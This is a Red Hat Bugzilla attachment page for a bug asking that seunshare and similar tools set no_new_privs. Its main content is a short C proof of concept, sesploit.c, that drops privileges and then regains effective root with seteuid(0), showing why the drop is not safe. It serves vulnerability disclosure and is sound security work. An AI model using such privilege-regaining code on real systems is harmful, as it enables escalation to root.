Login
[x]
Log in using an account from:
Fedora Account System
Red Hat Associate
Red Hat Customer
Or login using a Red Hat Bugzilla account
Forgot Password
Login:
Hide Forgot
Create an Account
Red Hat Bugzilla – Attachment 889104 Details for
Bug 885288
seunshare, etc should set no_new_privs
[?]
New
Simple Search
Advanced Search
My Links
Browse
Requests
Reports
Current State
Search
Tabular reports
Graphical reports
Duplicates
Other Reports
User Changes
Plotly Reports
Bug Status
Bug Severity
Non-Defaults
|
Product Dashboard
Help
Page Help!
Bug Writing Guidelines
What's new
Browser Support Policy
5.0.4.rh83 Release notes
FAQ
Guides index
User guide
Web Services
Contact
Legal
This site requires JavaScript to be enabled to function correctly, please enable it.
Example of why this is bad
sesploit.c (text/plain), 472 bytes, created by
Andy Lutomirski
on 2014-04-23 22:01:57 UTC
(
hide
)
Description:
Example of why this is bad
Filename:
MIME Type:
Creator:
Andy Lutomirski
Created:
2014-04-23 22:01:57 UTC
Size:
472 bytes
patch
obsolete
>#include <sys/types.h> >#include <unistd.h> >#include <stdio.h> >#include <err.h> > >int main() >{ > if (setuid(getuid()) != 0) > err(1, "setuid(getuid())"); > > printf("Dropped privs; real uid is %lu and effective uid is %lu\n", > (unsigned long)getuid(), (unsigned long)geteuid()); > > seteuid(0); > > /* Do something that risks executing untrusted code here */ > > if (geteuid() == 0) { > printf("It's baaaack!\n"); > } else { > printf("Phew, safe.\n"); > } > > return 0; >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 885288
: 889104